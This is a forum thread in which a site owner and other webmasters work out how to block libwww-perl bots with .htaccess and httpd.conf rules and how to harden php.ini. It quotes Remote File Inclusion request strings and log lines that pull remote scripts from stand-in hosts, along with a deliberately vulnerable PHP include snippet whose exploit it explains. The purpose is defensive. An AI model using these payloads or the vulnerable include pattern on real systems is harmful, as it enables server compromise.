I have what looks like a perl bot trying to hack into my sites.
I'm running a 1.? version of Apache on a Red Hat LAMP system.
I've been told that all I have to do is change something called a "User-Agent" in my .htaccess file - I'm unable to locate that file on my box.
Can anyone help me figure this out? I'm getting hit daily by this guy.
More likely, they are using libwww-perl to download your pages -- probably to extract snippets for inclusion on yet another useless made-for-Adsense "directory" site.
An .htaccess file may be located in any directory of your site, but the most usual and convenient place to put one is in the Web root (home page) directory. On some servers, it is there but not visible unless you set up your FTP client to show it by using "ls -al" instead of "ls" for the "show directory listing" command in FTP.
Since FTP clients vary, the method for making this change also varies, but it is a common feature of FTP clients.
However, if there is an existing .htaccess file, it is very important to make sure you can see it, because you should edit the one that is there rather than replace it. Some functions of your site may depend on what is already in that .htaccess file, even if it's "invisible."
If you don't have an .htaccess file, you can create one and upload it. On Windows machines, it's not possible to create a file named just ".htaccess" -- the OS will complain that "You must enter a filename" because it sees ".htaccess" as a file with an extension of ".htaccess" but no filename. It also won't know what program to use to open that kind of file.
So the usual approach is to give it a name with a common text-file extension and call it something like "my.htaccess.txt". This prevents the "You must enter a filename" problem and marks the file as a plain-text file, which is what you want.
Then, you'll need to add some directives in that file to block the libwww-perl user-agent. This is typically done using mod_rewrite, but if your server doesn't support that, there is another way. Here's the mod_rewrite code to block libwww-perl:
Options +FollowSymLinks
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule .* - [F]
Or, if you use a custom 403 error page, use this version instead:
Options +FollowSymLinks
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteCond %{REQUEST_URI} !^/path-to-your-custom-403-error-page\.html$
RewriteRule .* - [F]
With the second code snippet, the libwww-perl user-agent can see only the contents of your custom 403-Forbidden error page. If you use such a custom error page, then you must use this code and adjust the path to your custom 403 error document so it can be accessed.
Having created and edited your my.htaccess.txt file, upload it to your server and then rename it to .htaccess. If it "disappears" then that is the problem mentioned above -- It is there, but your FTP client won't show it.
If your .htaccess file causes a problem on your server, simply upload a blank .htaccess file to replace the broken one.
For more information, see the documents cited in our forum charter [webmasterworld.com] and the tutorials in the Apache forum section of the WebmasterWorld library [webmasterworld.com].
Jim
That's so cool. So, will I see the 403 message come up in my Apache logs the next time the libwww-perl bot tries to access it?
Also, once I've uploaded the .htaccess file, is it a good idea to restart apache?
So, to be certain, I create the .htaccess file (with the proper code snippets) and upload it to the root level of that particular website?
I have a few websites hosted. Should I put one in the root level of each site directory (/var/www/html/mysite1/.htaccess), or is it best to put it in the directory that contains all my websites (/var/www/html/.htaccess)?
There are often multiple ways to do the same thing, so here's an alternative, also for .htaccess:
# deny based on User-Agent
SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
SetEnvIfNoCase User-Agent "^.*psycheclone" block_bad_bots
deny from env=block_bad_bots
It says: if the User-Agent string contains libwww-perl, set the environment variable block_bad_bots. The final line says if any of the bad bots were matched, deny the request.
(I added another bot to show how to add more.)
This just uses a different Apache feature to do the same thing.
-----------
Personally, I'd give each website its own .htaccess, but I'm only guessing. The server-wide master configuration file is httpd.conf, and the code could probably go there to apply to all your sites. With any such change, be sure to test it as best you can, or at least watch closely at first to make sure it's working. I think there's a Firefox add-on that lets you specify the browser's User-Agent string, if you want to test explicitly.
You don't need to restart Apache. .htaccess is read every time a file is requested from the server.
------------
I get a lot of these requests from libwww-perl user-agents:
GET /index.php?inc=hxxp://hackersite.com/hacktext.txt?
and even
GET /index.html?inc=hxxp://hackersite.com/hacktext.txt?
These are Remote File Inclusion attacks, and they are very dangerous.
Blocking libwww-perl turns away a lot of them.
Using these in php.ini is another layer of defense:
register_globals = Off
allow_url_fopen = Off
Would you know what specific script it is that is referred to here as "index.php" and accepts "inc=" as a named variable to be "included"?
If your script doesn't expect and accept that named variable, and include the URL named as the value, then the request should be quite harmless. So what script(s) are they after?
Jim
The "?inc=" is because so many people use it as a variable name that it has a high probability of success.
The final "?" at the end of the query string is important. If the php script does something like
include("{$_GET['inc']}.inc");
which is supposed to append a file extension, the trailing "?" in the exploit turns everything that follows it into a query string, thus short-circuiting the intended build of the filename and leaving the hacker's injected text as a valid filename for inclusion from the remote site.
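To illustrate (a hypothetical sketch; the script and variable names are just the ones seen in these attack attempts, not any particular real script):
<?php
// index.php -- hypothetical vulnerable script.
// The author intends ?inc=menu to become include("menu.inc"):
include("{$_GET['inc']}.inc");

// But with allow_url_fopen enabled, a request such as
//   index.php?inc=http://hackersite.example/hacktext.txt?
// builds the string "http://hackersite.example/hacktext.txt?.inc".
// The trailing "?" turns the appended ".inc" into a query string on
// the remote fetch, so PHP retrieves hacktext.txt and executes it.
?>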
The hacker text can be a shell script like r57 or c99, or it can be a fairly simple php script that iterates all index.* files in a website and injects <iframe> code into the pages. This iframe exploit appears to be prevalent at this time.
Many people do not have secure php.ini settings.
Why can these iframes be dangerous? Try these articles:
[isc.sans.org...]
[isc.sans.org...] (Follow all the links at the bottom of the page.)
libwww-perl surely must have legitimate uses, and some mostly harmless ones, but if it's doing things like "?inc=" or "?root_path=", it's trying to do bad things.
libwww-perl, like Indy Library and many others, is just a collection of scripted functions. These libraries can be used for good or for ill.
Jim
Steve,
Just a heads up for others.
This is a bit redundant?
SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
when;
SetEnvIfNoCase User-Agent libwww block_bad_bots
or
SetEnvIfNoCase User-Agent perl block_bad_bots
(If the UA contains "libwww", or in the second example "perl", set block_bad_bots; you don't need both lines.)
would work just as well. KISS!
So the take-home lesson here is to avoid using common variable names in query strings, and to use local file includes as opposed to HTTP URL GETs.
I forgot to mention that include("{$_GET['inc']}.inc"); is flawed to start with. It should be handled using an array or switch statement so that the file to be included is drawn from a static list of legal possibilities, not blindly taken from the $_GET variable's value.
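A minimal sketch of that fix (the page names here are made up):
<?php
// Only these keys are legal; the visitor's input can select an
// entry but can never supply a filename or URL of its own.
$includes = array(
    'menu'    => 'menu.inc',
    'sidebar' => 'sidebar.inc',
);
$key = isset($_GET['inc']) ? $_GET['inc'] : 'menu';
if (isset($includes[$key])) {
    include($includes[$key]);   // always a known local file
} else {
    header('HTTP/1.0 404 Not Found');
    exit;
}
?>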
wilderness, I expect you're right. I'm weak on regexes, and used an explicit form that I knew I understood (safest that way). Apparently the form you used in your example does mean "contains".
If I understand that right, an equality test (in general, but not appropriate for this particular use) would be:
^libwww-perl$
What I'm keying off of is that it isn't a file include, it's a URL include, which is both wasteful of time and resources, and dramatically opens the scope for abuse! The script should be written to access only local files using local file reads, not HTTP GETs.
Unbelievable how many programmers make such 'small' but catastrophic mistakes!
Jim
Your 2nd example of:
^libwww-perl$
applies both "begins with" and "ends with" to the phrase (UA).
The same thing may simply be accomplished (as I previously did),
or,
in instances where non-traditional characters (possibly the hyphen in this instance) would require escaping with a backslash, you can instead just enclose the entire phrase/UA in quotes and omit the "begins with" and "ends with" anchors (or even include the anchors outside of the quotes, though again that's redundant).
The key with these lines is in utilizing short phrases that catch many words in any of the options ("begins with", "ends with" or "contains").
One good example is the number of old harvesters that began with the word "web".
Many folks would have 10-15 lines of words that began with "web" when the entire 10-15 lines could have been replaced with a single line.
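For example (these harvester names are just illustrative stand-ins):
# Ten or fifteen lines like these...
# SetEnvIfNoCase User-Agent ^webbandit bad_bots
# SetEnvIfNoCase User-Agent ^webcopier bad_bots
# SetEnvIfNoCase User-Agent ^webstripper bad_bots
# ...collapse into one "begins with" line:
SetEnvIfNoCase User-Agent ^web bad_bots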
BTW, I'm not much on the complicated rewrites that Jim and many others use, including wildcards and such.
Even though those extensive options exist with rewrites, another person could likely come along and accomplish similar rewrites with the simplest of understanding.
The more consistent one becomes in their creation of rewrites, the easier it becomes to locate syntax errors (which everybody will have sooner or later).
I'd surely "throw in the towel" were I required to sift through about 300 lines of the very, very long rewrites that I have seen used here.
Don
OK, I've added the following to my .htaccess file:
# deny based on User-Agent
SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
SetEnvIfNoCase User-Agent "^.*psycheclone" block_bad_bots
deny from env=block_bad_bots
I'll keep an eye on my logs and echo the results.
Stay tuned!
Well, I checked my logs this morning to find this:
77.235.43.91 - - [13/Sep/2007:04:37:33 -0400] "GET /barebonz/index.php?menu=http://www.example.com/what_foo/safe.txt? HTTP/1.1" 200 45183 "-" "libwww-perl/5.808"
Looks like the .htaccess file didn't work. Am I missing something?
I'd suggest:
# Deny based on User-Agent
SetEnvIfNoCase User-Agent "libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "psycheclone" bad_bot
#
# Allow universal access to robots.txt and custom 403 error page
SetEnvIf Request_URI "robots\.txt$" allow_all
SetEnvIf Request_URI "custom-403-page\.html$" allow_all
#
Order Deny,Allow
Allow from env=allow_all
Deny from env=bad_bot
Jim
KISS.
Keep it simple, stupid!
See my initial reply in this thread.
In addition, your .htaccess may be missing some leading and ending lines that are a necessary part of your host's requirements to make the file function.
Is this your first attempt at .htaccess?
What did your old, default .htaccess contain?
Determine this, then make the additions accordingly.
Jim's reply a few seconds before mine ;)
wilderness,
Yes I agree with trying to catch as many as possible with a single line. Yes there are many examples online with multiple lines that could be combined into one.
The .* just means zero or more occurrences of any characters, so ^.* means "starting at the beginning, zero or more characters followed by libwww-perl", so it means "contains", just like yours. However, as soon as I'm done here, I'm going to change my code to use your syntax after I have gone to a good regular expressions reference site to make sure I understand it completely and understand why I should not be using double quotes around the whole expression. The Apache site itself has examples using the quotes and other similar examples without them, with no explanation. I do believe your code is more correct, but I want to understand why.
In my own code, I do use a shorter form like libwww instead of libwww-perl.
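For anyone else following along, here's a quick way to check the "contains" behavior (a sketch using PHP's PCRE functions, just because PHP is already in this thread):
<?php
$ua = 'libwww-perl/5.808';
// An unanchored pattern and a "^.*"-prefixed pattern are both
// "contains" tests:
var_dump(preg_match('/libwww-perl/i', $ua));    // int(1)
var_dump(preg_match('/^.*libwww-perl/i', $ua)); // int(1)
// Anchoring both ends makes it an equality test, which fails here
// because of the version suffix:
var_dump(preg_match('/^libwww-perl$/i', $ua));  // int(0)
?>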
pugg09,
1. Are you hosting this site on your own computer or at a webhost? When you said "I'm unable to locate that file on my box.", I got the impression you're hosting it yourself. If you are hosting it yourself, you need to understand .htaccess like an expert, so go to the Apache site and study, study, study.
2. The code block I posted is working for me (giving 403's), but as noted above, I'm going to switch to what wilderness uses.
3. If you are at a webhost, your .htaccess file must be in public_html to successfully apply to the whole site. That is, the file must be public_html/.htaccess. If you are hosting the site at home, it should be in the site's top-level folder, whatever its name is. It might be necessary for you to modify your httpd.conf file so that .htaccess is enabled.
4. The most likely reason the code is not working for you is what jdMorgan said: other Allow, Deny, or Order directives in the file. See [httpd.apache.org...] As both jdMorgan and wilderness said, how you do this depends on what's already in your .htaccess. If there's nothing there already, it's simple. If there's stuff already there, it can get complicated. If there was nothing there previously, then your .htaccess might be disabled; see #3 above.
5. The line with psycheclone was just an example of how to add more. psycheclone only sucks bandwidth. It's not a hacker. You can omit the line.
6. The log entry you posted above is exactly the type of injection attack I was talking about. If you get that file from that site (with your Antivirus/antispyware/firewall all on high-alert), you'll probably find it is a very nasty PHP script, which your AV might flag as a virus. Be careful.
As with all code snippets provided on any BBS, the purpose is to lead you in the direction of a solution and provide keywords to help you with web searching. It is assumed that you will investigate and read relevant articles in order to understand a method before you implement it.
Steve,
If you review the Apache documentation for rewrites, you will see that it uses quotes on every single line.
However... that is incorrect!
It may be the Apache-suggested style; however, the quotes remain redundant and unnecessary, with only a solitary exception.
That exception is using quotes to match a phrase "exactly as" written (it could additionally be "contains", "begins with" or "ends with"), in which case we are NOT required to escape special characters with a backslash -- but ONLY when utilizing the quotes.
Of a current 1,700-line .htaccess (with notation of condensed and combined lines) that has been building for nearly seven years, I have less than a handful of lines that use quotes in the rewrites.
These exceptions were utilized only when other methods failed (please don't ask for examples of failure). ;)
Don
You posted links to two good regex sites in a previous thread. I found those more useful than the one I was using, and bookmarked them. But no place has been much use about the quotes. Except for your one exception (being able to specify special chars without escaping them), it looks like the quotes are really just to help Apache determine the correct argument boundaries, so it doesn't think there are 5 arguments when you intended 4.
"please don't ask for examples of failure" - Don
Thank you everyone for your incredibly valuable input.
Yes, I'm hosting this on a machine of my own.
A quick find (find / .htaccess | grep .htaccess) produced no results, even when I logged in as root. So, if I do have another .htaccess, how would I know?
The .htaccess file that I created was placed at the root level of my site (/var/www/html/mysite1/.htaccess).
I'm not using Apache 2.x - so, to "study study study", where would I even start? Could you post a few decent links, so that I'm not wasting time while hackers are injecting their Perl scripts?
Thanks again.
Pugg09
OK, I've updated my .htaccess to Jim's suggestion:
# Deny based on User-Agent
SetEnvIfNoCase User-Agent "libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "psycheclone" bad_bot
#
# Allow universal access to robots.txt and custom 403 error page
SetEnvIf Request_URI "robots\.txt$" allow_all
#
Order Deny,Allow
Allow from env=allow_all
Deny from env=bad_bot
...we'll see what the logs say in the morning.
...stay tuned for episode 2 of the Apache Newbie vs the Curse of the Black Perl
mod_access [httpd.apache.org]
mod_rewrite [httpd.apache.org]
mod_setenvif [httpd.apache.org]
I'm not sure if you meant you're "not" using Apache 2.x, or you're "now" using Apache 2.x, but the 1.3 docs will serve well for a start and Apache 2.x is backwards-compatible to Apache 1.3x.
Jim
Wow, I really opened up a hornet's nest, didn't I?
No nest.
As Steve, Jim and I explained (and others are aware), with rewrites there are many ways to "skin a cat".
All we've really been discussing are some minor clarifications that make proofreading larger .htaccess files easier in the event that syntax errors occur.
Knowing that you're hosting on your own computer and presumably in Linux, I think I can clarify some things better. I'll try to be "descriptive" rather than "absolute" about file locations.
.htaccess in Linux is a hidden file (any filename beginning with a dot is hidden), which is probably why your find command missed it; I believe the correct form is find / -name .htaccess. I don't know if grep will have access to it.
It goes in the same folder as your home page (your top level index.html, index.htm, or index.php).
If you didn't have an .htaccess file at all in that location, before you started this thread, then these new lines will be the only contents in it. If that's the case, try the following lines. If your .htaccess is enabled, these should work:
SetEnvIfNoCase User-Agent libwww-perl bad_bots
order deny,allow
deny from env=bad_bots
If they don't work, I'm guessing it's because your httpd.conf file has settings that disable the use of .htaccess. Beyond this point, my knowledge is very shaky.
First, to find httpd.conf, go to wherever Apache is installed. It should have a subfolder called conf, where there is a text file httpd.conf. Open it for editing.
For some background, see [webmasterworld.com...]
Now also see [httpd.apache.org...] . Where it refers to "your main server configuration", it means "httpd.conf". There is some troubleshooting at the bottom of the page.
That page also says that it's best to put configuration code of this type (like the SetEnvIf) in httpd.conf if you possibly can. However, from the context of the article, I think what they mean is that it's best not to give that much power to your end-users (like if you're a hosting company). So for now, try to get .htaccess working. You can always move the code into httpd.conf later, but as you'll see, that is a very complex and intimidating file to try to work with.
There are some settings in it that are very different depending on whether you are just setting up a test box (like my WAMP) where security isn't an issue, or a production box like yours where the most secure settings possible are of utmost importance.
Evidently the setting to enable .htaccess is AllowOverride, which appears in several locations in the file. On your box, it will be ok to set AllowOverride to All (because you're not concerned with giving power to "end users"), but I don't know in which of the AllowOverride locations you do this, and I am now at the absolute limit of my knowledge. :) But this will hopefully give you some keywords with which to search in the Apache docs for a better answer.
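As a sketch of what to look for (the path is just an example; match it to your own DocumentRoot):
# In httpd.conf -- enable .htaccess processing for the document root.
# "All" permits every override type, including the FileInfo and
# Limit overrides that the directives in this thread rely on.
<Directory "/var/www/html">
    AllowOverride All
</Directory>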
The php.ini file that I referred to earlier is also very important, but it's a whole 'nuther can of worms. To get you started, the file is in your LAMP, in the /php folder (PHP's top level folder). Whatever else is there, just make sure it has in it the two lines:
register_globals = Off
allow_url_fopen = Off
Also, make sure you have complete backup copies of all your sites on CD/DVD. If you don't, do it now. Hosting your own site is very risky unless you are an expert. The chances that someone will get in are high, and it is always possible that at some point you might have to reformat, reinstall O/S, and restore everything from backups.
wilderness,
I went back to the full libwww-perl line after discovering log entries from Lynx (presumably the text browser) that have a User-Agent of libwww-FM.
From what little reading I've done, it appears that in httpd.conf I can use a "<Directory>" section to set the allow/deny values for a directory that Apache knows about. So, after backing up my original httpd.conf, I added the following entry to it:
<Directory "/var/www/html/mysite1">
SetEnvIfNoCase User-Agent libwww-perl bad_bots
order deny,allow
deny from env=bad_bots
</Directory>
I then ran the following to restart my Apache daemon:
./apachectl graceful
I'll let this run overnight again, and check my logs in the morning.
Stay tuned for episode 3 of "The Curse of the Black Perl".
PS. Have any of you noticed how many sites are hosting malicious Perl scripts? Every single one in my logs came from a legitimate business site. Some of them were sitting in /images directories, disguised as an icon or some other type of harmless file.
I checked my logs this morning and I just wanted to share two numbers with all of you who helped me.
The numbers are: 403 and 404!
Woo hoo!
It looks like the <Directory> entry and the php.ini changes fixed the security hole.
After checking all my other sites, it looks like everything is working great.
A "BIG", "HUGE", "ENORMOUS" THANK YOU to all of you.
Don't you just love it when good triumphs over evil? This has definitely been an experience I will not soon forget.
Thanks again guys. I'm now off to the bookstore to pick up way too many texts on Apache.
Here's a log snippet
index.php?menu=http://biancaa1990.example.com/script9.txt? HTTP/1.1" 200 45043 "-" "Mozilla/3.0 (compatible; Indy Library)"
I was able to block the Perl bots, but how would I thwart this dude, who's apparently using a legit browser?
Thanks in advance.
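As noted earlier in the thread, Indy Library is another scripting library, not a real browser, so the same approach should work. A minimal sketch, to merge into the existing block:
# "Indy Library" appears in the User-Agent string of these requests,
# so it can be matched just like libwww-perl:
SetEnvIfNoCase User-Agent "Indy Library" bad_bot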